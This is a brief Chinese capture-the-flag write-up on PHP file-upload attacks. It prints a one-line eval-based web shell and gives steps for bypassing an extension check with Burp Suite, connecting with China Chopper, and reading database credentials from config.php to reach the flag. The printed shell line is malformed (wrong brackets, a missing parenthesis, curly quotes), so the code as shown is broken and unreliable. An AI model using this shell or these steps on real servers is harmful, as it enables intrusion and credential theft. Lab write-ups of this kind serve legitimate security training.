来一波原理:
eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false
<?php @eval($_POST(‘1’);?>
各种绕过文件上传的姿势:
如果你已经成功上传了一个一句话木马文件,那么现在就可以使用菜刀链接了
具体的步骤就是右键添加;输入url加上上传路径及上传文件,具体的可以参考这个例题:
题目链接:解题步骤
- 打开网页我们发现需要上传一个文件我们先尝试上传名为1.php的文件(本文件夹中)
此时我们将1.php文件扩展名改为1.jpg然后打开burpsuite抓包抓包之后我们将文件名改为1.php
然后点击forward
- 我们利用中国菜刀连接目标服务器
菜刀连接上去在里面发现了数据库配置文件config.php,看到了数据库账号密码
编辑菜刀连接数据库上去拿到flag
然后右键点击数据库管理进入到页面在页面上方输入sql语句寻找包含flag的文件
